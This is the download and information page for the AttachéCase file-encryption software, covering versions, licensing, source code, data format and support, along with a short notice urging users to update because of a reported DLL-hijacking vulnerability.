![App Store button](https://hibara.org/software/attachecase/img/Download_on_the_Mac_App_Store_Badge_US-UK_RGB_blk_092917.svg)

**Hash value**

*   
*   
*   

MD5:  
SHA-1:  
SHA-256:  

MD5:  
SHA-1:  
SHA-256:  

MD5:  
SHA-1:  
SHA-256:  

**Update history for Windows version**

**Update history for macOS version**

**Old Ver.3**

> **Important Notice（2022/03/30）**
> 
> A previously reported vulnerability allows "AttacheCase#3" to be DLL hijacked (DLL preloaded) by placing certain DLL files in the location where the output self-extracting archive file and the main body "AttacheCase.exe" are located.
> 
> Please update to the latest version "AttacheCase#3" as soon as possible.
> 
> JVN#61502349  
> **Self-Extracting Encrypted Files created by AttacheCase may insecurely load Dynamic Link Libraries**  
> https://jvn.jp/en/jp/JVN61502349/  

![Windows10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg)

\* Windows XP/Vista/7/8/10 / NET Framework 4.0 later

*   Although support for this software has been discontinued by Microsoft, it also will work on Windows XP.
*   .NET Framework 4 or higher is required for operation.

**Hash value**

*   
*   

**Update history**

**Old Ver.2**

![WindowsXP logo](https://hibara.org/software/attachecase/img/windows_xp.svg)

\* Windows 95, 98, XP

**Hash value**

*   
*   

**Open source license**

**GPLv3 license**

> Copyright (C) 2020 M.Hibara
> 
> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
> 
> This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
> 
> You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.

**Source code**

**hibara - GitHub**

It has been built and tested with Microsoft Visual Studio 2019. It includes everything you need to build, including resource files. You are welcome to report bugs and requests to Issue, pull requests, forks, etc.

The MacOS version is not open source due to Apple's terms and conditions. However, the classes required for encryption and decryption (specifically, Encrypt4.cs and Decrypt4.cs) are the same.

![GitHubロゴ](https://hibara.org/software/attachecase/img/github-octcat.png)

**Data specification**

Starting from ver.4, the cryptographic algorithm has been changed to AES 256bit CBC mode for ease of porting. I keep that .NET is moving in the direction of cutting off Rijindael 256 support for in the future in mind.

In addition, I used to use SHA-1 for checksums, which is a heavy load. MD5 is now sufficient for this purpose.

The file information stored in the data is now stored serially as binary data instead of character strings. For details, please see the following PDF file.

Download data specification

To learn more about the data structure, including previous versions (ver.3 and 2), please download the PDF data above and check it out.

**オンラインヘルプ**

**Support**

For inquiries (support), please contact us by e-mail. Please contact us at the following address

> Mitsuhiro Hibara

If you would like to report a problem, please specify your OS version (Windows, macOS, and its version), the version of the AttachéCase you are using, and describe a situation that I can reproduce. If I can't reproduce the problem, I can't fix it.

If possible, please attach reproducible files and passwords (dummy data and dummy passwords are fine) so that I can make revisions smoothly.

> **Improvements, bug reports, and pull requests from GitHub are most welcome!**
> 
> If possible, please use the GitHub repository instead of your email address, and send improvements and bug reports to Issues , or Pull Requests if you can fix the code directly.

Tag

#apple